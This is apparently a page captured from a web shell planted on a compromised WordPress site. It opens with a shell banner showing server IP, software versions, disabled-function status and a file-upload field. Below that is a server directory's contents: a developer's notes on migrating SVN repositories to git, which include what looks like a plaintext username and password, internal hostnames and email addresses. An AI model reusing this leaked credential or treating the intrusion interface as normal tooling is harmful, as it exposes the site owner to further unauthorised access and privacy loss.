Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /home/git/ |
Upload File : |
young / focaL56tupik
svn checkout https://svn.hostz.org/hsvn/alive.delphi/trunk .
svn log -q | awk -F '|' '/^r/ {sub("^ ", "", $2); sub(" $", "", $2); print $2" = "$2" <"$2">"}' | sort -u > authors-transform.txt
vi authors-transform.txt
#git svn clone https://svn.hostz.org/hsvn/alive.delphi/trunk --no-metadata -A authors-transform.txt --stdlayout .
git svn clone --no-metadata -A authors-transform.txt --stdlayout svn://svn.hostz.org/alive.delphi .
svnserve -d -r /media/svn
Can't locate SVN/Core.pm in @INC (you may need to install the SVN::Core module) (@INC contains: /usr/local/share/perl5 /etc/perl
/usr/local/lib/x86_64-linux-gnu/perl/5.22.1 /usr/local/share/perl/5.22.1 /usr/lib/x86_64-linux-gnu/perl5/5.22 /usr/share/perl5
/usr/lib/x86_64-linux-gnu/perl/5.22 /usr/share/perl/5.22 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base .) at
/usr/local/share/perl5/Git/SVN/Utils.pm line 6.
apt-get install libapr1 libapr1-dev libaprutil1-dev sqlite3 libsqlite3-dev
cpan
cpan SVN::Core
install CPAN
reload cpan
svn://svn.hostz.org/alive.delphi/trunk
git remote add origin git@pegasus.hostz.org:delphi-alive.git
======================================================================================================
drwxr-xr-x 7 www-data www-data 4096 Sep 2 2012 android "Send To Tablet" "adosbox"
drwxr-xr-x 6 www-data www-data 4096 Sep 2 2012 cluego.game
-rw-r--r-- 1 www-data www-data 571 May 12 2018 create_project.php
drwxr-xr-x 7 www-data www-data 4096 Sep 2 2012 crossword.game
drwxr-xr-x 7 www-data www-data 4096 Sep 2 2012 data-recovery.delphi
drwxr-xr-x 6 www-data www-data 4096 Sep 2 2012 documents
drwxr-xr-x 7 www-data www-data 4096 Sep 2 2012 hopeinstoughton.books
drwxr-xr-x 7 www-data www-data 4096 Sep 2 2012 hopeinstoughton.delphi
drwxr-xr-x 7 www-data www-data 4096 Sep 2 2012 misc.delphi
-rw-r--r-- 1 www-data www-data 119 May 12 2018 phperrors.log
drwxrwxr-x 6 www-data www-data 4096 May 12 2018 pkp
drwxr-xr-x 7 www-data www-data 4096 Sep 2 2012 rvms.delphi
drwxr-xr-x 6 www-data www-data 4096 Sep 2 2012 suweb-spider.www
-rw-r--r-- 1 www-data www-data 511 May 12 2018 .svngroups
drwxr-xr-x 4 www-data www-data 4096 Sep 2 2012 template
drwxr-xr-x 7 www-data www-data 4096 Sep 2 2012 the-boot-cd.delphi
drwxr-xr-x 7 www-data www-data 4096 Sep 2 2012 the-computer-site.www
======================================================================================================
// ON REMOTE
git init --bare alive-www.git
// ON UBUNTU10020
svn checkout https://svn.hostz.org/hsvn/alive.www/trunk .
svn log -q | awk -F '|' '/^r/ {sub("^ ", "", $2); sub(" $", "", $2); print $2" = "$2" <"$2">"}' | sort -u > authors-transform.txt
root = root <phil@hostz.org>
young = Phil Y <phil@hostz.org>
mkdir x
git svn clone --no-metadata -A authors-transform.txt --stdlayout svn://svn.hostz.org/alive.www x
cd x
git remote add origin git@pegasus.hostz.org:alive-www.git
git push --set-upstream origin master